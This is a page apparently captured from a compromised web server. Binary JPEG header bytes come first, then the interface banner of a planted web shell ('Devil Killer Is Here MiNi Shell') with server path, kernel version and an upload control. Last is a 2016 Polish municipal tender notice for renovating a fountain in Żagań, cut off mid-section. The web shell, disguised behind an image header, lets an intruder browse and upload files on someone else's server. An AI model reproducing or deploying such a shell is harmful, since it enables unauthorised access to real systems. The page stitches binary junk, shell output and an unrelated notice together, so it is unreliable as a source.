JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160121/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160121/14490-N-2016.html

<p class="kh_header"><b>Żagań: MODERNIZACJA FONTANN ZNAJDUJĄCYCH SIĘ NA TERENIE PARKU PAŁACOWEGO W ŻAGANIU - ETAP II : Remont fontanny Żabia studnia nad Bobrem</b><br>
<b>Numer ogłoszenia: 14490 - 2016; data zamieszczenia: 21.01.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Żagań o Statusie Miejskim , Plac Słowiański 17, 68-100 Żagań, woj. lubuskie, tel. 68 4771040, faks 68 4771017.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> MODERNIZACJA FONTANN ZNAJDUJĄCYCH SIĘ NA TERENIE PARKU PAŁACOWEGO W ŻAGANIU - ETAP II : Remont fontanny Żabia studnia nad Bobrem.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> W zakresie : remontu i rekonstrukcji fontanny Żabia studnia nad Bobrem wraz z przyłączem wewnętrznej sieci instalacji wodnej, kanalizacji sanitarnej i instalacji elektrycznej
3.1. Teren, na którym planowana jest inwestycja, zlokalizowany jest w Żaganiu przy ul. Szprotawskiej , dz. Nr 799, który jest parkiem pałacowym. Obecnie teren parku jest strefą wypoczynkowo-rekreacyjną dla mieszkańców miasta. Nieruchomość  objęta jest ochroną konserwatorską i wpisana do rejestru zabytków. Obecny stan techniczny fontanny włącznie z przyłączem instalacji  wodno-kanalizacyjnej jest zły pod względem architektoniczno-wizualnym jak i funkcjonalno-użytkowym. W nawiązaniu do realizowanych obecnie prac rewitalizacyjnych kompleksu parkowo-pałacowego  remont fontanny będzie uzupełnieniem poprawiającym funkcjonalność i wizerunek architektoniczny parku pałacowego  w Żaganiu.   Odtworzenie i modernizacja fontanny  i urządzeń wodnych pomoże przywrócić część dawnej świetności tego miejsca i podniesie jego walory estetyczne. 
3.2. Zakres  przewidywanych  robót  obejmuje:
- rozebranie istniejących elementów fontanny (ściany cembrowiny, usunięcie 
   podłoża),
- zabezpieczenie i konserwacja zachowanych elementów, które zostaną 
   poddane konserwacji,
- wykonanie nowego podłoża zbiornika fontanny,
- wykonanie ścian cembrowiny wg pierwotnego układu oraz kształtu fontanny,
- wykonanie i montaż elementów dekoracyjnych fontanny, w tym 
   zrekonstruowanego zespołu     
   figur, mis, waz - wg programu prac konserwatorskich,
- uporządkowanie i remont otoczenia wokół fontanny.
Zakres   przewidywanych  robót  w szczególności obejmuje: 
 FONTANNA ŻABIA STUDNIA NAD BOBREM
- Rozebranie istniejących elementów architektonicznych fontanny, ogrodzenia i schodów,
- Demontaż zachowanych oryginalnych kamiennych elementów fontanny i poddanie ich pracom konserwatorsko - restauratorskim
- Rozebranie istniejących  elementów ogrodzenia
- Wykonanie nowego ogrodzenia:
- słupki ceglane : cegła ręcznie formowana postarzana, słupki zwieńczone 
   kamiennymi nakrywami (płyty z piaskowca z profilowanymi brzegami),
- pomiędzy słupkami grodzenie wykonane z ceramicznych kształtek także 
   zwieńczone kamiennymi nakrywami z piaskowca
- montaż przęseł i drewnianej furtki, malowanie w kolorze przełamanej bieli
- Montaż kamiennych schodów wykonanych z piaskowca
- Wykonanie nawierzchni terenowej  z mineralnych mieszanek wysokogatunkowych surowców wokół fontanny (dobór kruszywa należy dostosować do istniejącego na nawierzchni ścieżek w obrębie wykonanej rewitalizacji parku)
- Wykonanie nowego doprowadzenia i odprowadzenia wody w systemie obiegu zamkniętego
- Montaż i instalacja nowego pełnego systemu instalacji dysz wylotowych wodotrysku
- Wykonanie kanalizacji umożliwiającej spust wody z fontanny
- Wykonanie instalacji elektrycznej  - zasilanie pompy wodnej i oświetlenia
- Wykonanie nowego podłoża zbiornika fontanny
- Wykonanie  ściany cembrowiny wg pierwotnego układu oraz kształtu
- Wykonanie w środkowej części fontanny postumentu nawiązującego wielkością i kształtem do pierwotnie istniejącego
- Montaż poddanych konserwacji kamiennych elementów
- Ustawienie i montaż zrekonstruowanej wg zdjęć archiwalnych i stanu obecnego misy (muszli) i  figury żaby (np. odlewy betonowe imitujące kamień)- przed montażem przedstawić do akceptacji Zamawiającemu. 
UWAGA ! 
- ZAMOWIENIE NIE OBEJMUJE REKONSTRUKCJI FIGURY SATYRA I POSTUMENTU W ŚRODKOWEJ CZĘŚCI FONTANNY. 
URZĄDZENIA I OPIS INSTALACJI
- Przepływ wody w instalacji fontanny podzielony jest na dwa niezależnie pracujące  obiegi : uzdatniania wody i zasilania dyszy
- W obiegu uzdatniania woda pobierana (zasysana) będzie z niecki fontanny przez pompę filtracyjną dwoma koszami ssawnymi. Za pomocą pompy woda podawana będzie na filtr piaskowy i dezynfekowana, a następnie kierowana z powrotem do niecki dennymi dyszami napływowymi
- Do niecki fontanny dostarczana będzie woda wodociągowa do pierwszego napełnienia oraz pokrycia bieżących ubytków eksploatacyjnych, które będą  odczytywane czujnikiem poziomu wody i uruchamiane elektrozaworem.
- Odprowadzenie nadmiaru wody z niecki fontanny odbywać się będzie przez przelew awaryjny bezpośrednio do kanalizacji
- Spust wody z niecki fontanny odbywa się przez spust denny z zasuwą
- W obiegu zasilania dyszy fontannowej woda zasilana będzie z niecki fontannowej przez pompę obiegową jednym koszem ssawnym
- Wszystkie odcinki instalacji pod zbiornikami wody należy wykonać przed wykonaniem dna niecki, a elementy przejścia przez dno jako gotowe elementy zamontować przed betonowaniem
- Pompy fontanny pracują w obiegu zamkniętym i będą wyłączane okresowo.
- Urządzenia :
- pompy filtracji (PF)
- filtr piaskowy (FP) z zaworem sześciodrogowym (ZS)
- śluza dozująca (SD)
- czujnik poziomu wody (CP)
- dysze fontanny :żabia studnia nad Bobrem (NMS)	
- pompa obiegowa (PO).
Uzgodnienia branżowe :
1.	Lubuski Wojewódzki Konserwator Zabytków  -  Decyzja z dn. 29.05.2015, znak pisma ZN.5142.23.2015 [mZag]3
 Fontanna żabia studnia nad Bobrem :
- podczas prac rozbiórkowych  należy zwrócić szczególną uwagę na 
zabezpieczenie historycznych elementów kamiennych przeznaczonych do 
  konserwacji
- przed wykonaniem piaskowcowych zwieńczeń cembrowiny nawiązujących do  
  historycznego kształtu oraz nowej niecki fontanny należy przedstawić do
  akceptacji przez LWKZ lub jego przedstawiciela kolor oraz fakturę materiału
  wprowadzanego do podłoża zbiornika (dna niecki fontanny) oraz ścian   
  cembrowiny oraz wybrany rodzaj piaskowca i kształt zwieńczenia cembrowiny 
   w celu oceny odpowiedniego dostosowania materiału  i wykonania elementu  
  rekonstruowanego,
- przed wykonaniem  ogrodzenia  należy przedstawić do akceptacji  wzór kształtki ceramicznej oraz cegły,
- przed przystąpieniem do prac montażowych przęseł i furtki należy wykonać
  model  (fragment przęsła i furtki) oraz wykończenia kolorystycznego  i   
  przedstawić do akceptacji
- rodzaj nawierzchni mineralnej wokół fontanny należy dostosować do istniejącej nawierzchni ścieżek w obrębie wykonanej rewitalizacji parku.
Udzielone jest pozwolenie na wykonywanie badań i prac konserwatorskich i restauratorskich przy zachowanych historycznych elementach kamiennych fontann w zakresie :
- wykonywania dokumentacji fotograficznej stanu obiektu przed konserwacja i w trakcie
- wykonania badań petrograficznych oraz rozpoznania stratygrafii nawarstwień 
   technologicznych (Wyniki badań należy przedstawić LWKZ w celu zapoznania)
- wykonania prób oczyszczania powierzchni metod, pozwalających na usunięcie 
   luźnych osadów oraz zabrudzeń
- dezynfekcji kamieni preparatem biobójczym
- wstępnego oczyszczenia powierzchni kamieni poprzez użycie wody pod 
   ciśnieniem
- odsolenia obiektu
- wypełnienia rozwarstwień oraz pęknięć 
- wykonania uzupełnień w miejscach spękań i ubytków, poprzez flekowanie 
   większych ubytków  i uzupełnienie zaprawą mineralną mniejszych
- rekonstrukcji rzeźbiarskiej brakujących elementów
- scalania kolorystycznego powierzchni obiektów
- hydrofobizacji strukturalnej.
Z uwagi na lokalizację inwestycji oraz możliwość natrafienia podczas prowadzenia prac ziemnych na relikty warstw historycznych , w tym pozostałości historycznych elementów kompozycyjnych parku, inwestor zobowiązany jest zapewnić badania archeologiczne w granicach inwestycji, na które należy uzyskać pozwolenie wojewódzkiego konserwatora zabytków trybie decyzji administracyjnej. Zamawiający jako jednocześnie Inwestor  nakłada taki obowiązek Wykonawcy robót.
Istnieje konieczność niezwłocznego zawiadomienia konserwatora zabytków o zagrożeniach lub nowych okolicznościach ujawnionych w trakcie prac konserwatorskich, restauratorskich oraz robót budowlanych.
Wykonawca zobowiązany jest do prowadzenia dokumentacji przebiegu prac konserwatorskich i restauratorskich w sposób umożliwiający jednoznaczną identyfikację i dokonana lokalizację przestrzenną wszystkich czynności, użytych materiałów oraz dokonanych odkryć i przekazaniu jej wojewódzkiemu konserwatorowi zabytków w terminie do 3 miesięcy od dnia zakończenia tych prac lub badań.
Po zakończeniu prac konserwatorskich wskazanych w pozwoleniu należy wykonać opracowanie sposobu postępowania z zabytkiem i przekazać opracowanie wojewódzkiemu konserwatorowi zabytków w terminie 3 miesięcy od dnia zakończenia tych prac lub badań.
Należy również podejmować inne działania określone w decyzji LWKZ, które zapobiegną uszkodzeniu lub zniszczeniu zabytku, polegające na:
- zabezpieczeniu przed zniszczeniem lub uszkodzeniem terenu parku w miejscach prowadzenia prac w szczególności nawierzchni, roślinności (pni, systemów korzeniowych drzew, a także grup krzewów, roślin poszycia parku).
- przywróceniu terenu w miejscach prowadzonej inwestycji do poprzedniego stanu, po wykonanych pracach, w szczególności w obszarze zrealizowanej rewitalizacji parku.
- zachowania w trakcie realizacji prac ziemnych nawierzchni historycznych, a także układu komunikacyjnego  na terenie parku zrealizowanego podczas rewitalizacji, a po zakończeniu prac przywrócenia terenu do stanu poprzedniego, w szczególności zachowania przekrojów poprzecznych i poziomych ścieżek..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.45.30.00-7, 45.33.00.00-9, 45.31.00.00-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 28.06.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie żąda wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>w  zakresie  posiadania  przez Wykonawcę uprawnień do wykonywania określonej 
     działalności lub czynności, Zamawiający nie żąda od Wykonawcy  potwierdzenia   
     posiadania uprawnień do wykonywania działalności, gdyż przepisy prawa nie nakładają  
     obowiązku posiadania  takowych uprawnień typu koncesja, zezwolenie, licencja</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>2) w zakresie  posiadania wiedzy i doświadczenia Zamawiający uzna za spełniającego ten 
    wymóg Wykonawcę,  który w okresie ostatnich  pięciu lat przed upływem składania ofert , 
    a jeżeli okres prowadzenia  działalności jest krótszy- w tym okresie :  
    - wykonał co najmniej  dwie roboty budowlane odpowiadające swoim zakresem i wartością 
      robotom stanowiącym przedmiot zamówienia - remont, modernizacja lub wybudowanie  
      fontann  o wartości co  najmniej 150 000,00; 
    - wykonał co najmniej 3 prace konserwatorskie  przy rzeźbach zabytkowych (tj. objętych 
      jedną z form ochrony - zgodnie z ustawą  z dnia 23 lipca 2013 r. 
      o ochronie zabytków i opiece nad zabytkami Dz.U. z 2013 r. Nr 162, z poźn. zm.
    Na potwierdzenie spełnienia tego warunku  Wykonawca złoży wraz z ofertą dokument 
    określony w punkcie 6.1  podpunkt 2 SIWZ. 

    Wykonawcy występujący wspólnie  powyższy warunek mogą spełnić łącznie.     
    Wykonawca może polegać na wiedzy i doświadczeniu innych podmiotów, niezależnie od 
    charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji 
    obowiązany jest udowodnić Zamawiającemu, iż będzie dysponował tymi  zasobami  w 
    trakcie realizacji zamówienia, w szczególności przedstawiając w tym celu  pisemne 
    zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na 
    potrzeby  wykonania zamówienia oraz składając dokumenty dotyczące tego podmiotu 
    określone w punkcie 6.2 SIWZ. Podmiot, który zobowiązał się do udostepnienia zasobów 
    odpowiada solidarnie z wykonawcą za szkodę zamawiającego powstałą wskutek
    nieudostępnienia tych zasobów, chyba że za  nieudostępnienie zasobów nie ponosi  winy;</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>3) w zakresie dysponowania  osobami zdolnymi  do wykonania zamówienia, Zamawiający 
    uzna za spełniającego te wymogi  tego Wykonawcę, który będzie dysponował co najmniej:     
    - jedną osobą  posiadającą  uprawnienia do pełnienia samodzielnych funkcji technicznych 
     w  budownictwie bez ograniczeń w specjalności konstrukcyjno-budowlanej;  instalacyjnej 
     w zakresie sieci wodno-kanalizacyjnej;  w specjalności instalacyjnej w zakresie sieci 
     elektrycznej  lub dysponującą innymi uprawnieniami umożliwiającymi wykonywanie tych 
     samych   czynności, do wykonywania których uprawniają w aktualnym stanie prawnym 
     uprawnienia w w/w specjalności,
    - posiadającą uprawienia do prowadzenia  prac przy obiektach zabytkowych -zgodnie z 
      Rozporządzeniem  Ministra Kultury i Dziedzictwa Narodowego  z dnia 27.07.2011r w       
      sprawie prowadzenia prac konserwatorskich, restauratorskich, robót budowlanych,
      badań  konserwatorskich i architektonicznych, a także innych działań przy zabytku  
      wpisanym do rejestru zabytków oraz badań archeologicznych (Dz. U. Nr 165, poz.987), 
      a w szczególności do kierowania robotami budowlanymi przy zabytkach nieruchomych   
      wpisanych do rejestru zabytków. 
     
    Na potwierdzenie spełnienia powyższych warunków, Wykonawca złoży wraz z ofertą 
    dokument  określony w  punkcie 6.1 podpunkt 3 SIWZ 
    Wykonawcy występujący wspólnie  powyższy warunek mogą spełnić łącznie. 
    W zakresie dysponowania osobami zdolnymi do wykonania zamówienia Wykonawca 
    może polegać na potencjale innych podmiotów, niezależnie od charakteru prawnego 
    łączących go z nimi stosunków.  Wykonawca w takiej sytuacji obowiązany jest udowodnić    
    Zamawiającemu, iż będzie dysponował tymi  zasobami  w trakcie realizacji zamówienia, w    
    szczególności przedstawiając w tym celu  pisemne zobowiązanie tych podmiotów do 
    oddania mu do dyspozycji niezbędnych zasobów na potrzeby  wykonania zamówienia 
    oraz składając dokumenty dotyczące tego podmiotu określone w punkcie 6.2 SIWZ.
    Podmiot, który zobowiązał się do udostepnienia zasobów odpowiada solidarnie z 
    wykonawcą za szkodę zamawiającego powstałą wskutek nieudostępnienia tych zasobów, 
    chyba że za  nieudostępnienie zasobów nie ponosi  winy;</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>4) w zakresie sytuacji ekonomicznej i finansowej,   Zamawiający  nie stawia żadnego 
     szczególnego warunku</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">określenie robót budowlanych, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o robotach budowlanych niewykonanych lub wykonanych nienależycie<br>Obowiązek wykazania i złożenia poświadczeń o należytym  bądź nienależytym wykonaniu 
    robót budowlanych wymienionych w wykazie, dotyczy najważniejszych robót, określonych
     w punkcie 5.5 podpunkt  2 SIWZ   
    W przypadku gdy Zamawiający jest podmiotem na rzecz którego roboty  wskazane w 
    wykazie, zostały wcześniej wykonane, a w stosunku do których Zamawiający żąda 
    poświadczeń,  Wykonawca nie ma obowiązku przedkładania  dowodów- poświadczeń;;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Haromonogram robót 
2. Poglądowy kosztorys ofertowy</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - Okres Gwarancji - 10</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza możliwość zmiany postanowień zawartej umowy w  stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy :
1) w zakresie wydłużenia terminu obowiązywania umowy, pod warunkiem  że:  
   a) prace objęte umową o wykonanie robót budowlanych zostały wstrzymane przez 
       właściwe organy z przyczyn niezależnych od Wykonawcy, 
   b) wystąpiły nietypowe dla  danej pory roku  warunki atmosferyczne, które ze względów 
       obiektywnych uniemożliwiają wykonanie robót budowlanych zgodnie z normami  
       techniczno-budowlanymi, co uniemożliwia  terminowe zakończenie realizacji przedmiotu 
       umowy,
   c) w wyniku działania siły wyżej (klęski żywiołowe :  trzęsienia ziemi, pożary, powodzie,  
       tornada,  wichury itp.), mające wpływ na terminowość robót budowlanych, 
   d) zachodzi konieczność uzyskania niemożliwych do przewidzenia na etapie   planowania 
       inwestycji o wykonanie robót budowlanych danych,  zgody osób trzecich  lub właściwych 
       organów. 
   Okres przesunięcia terminu zakończenia  równy będzie okresowi przerwy lub postoju;    
2) w zakresie zmiany lub rezygnacji z podwykonawcy : 
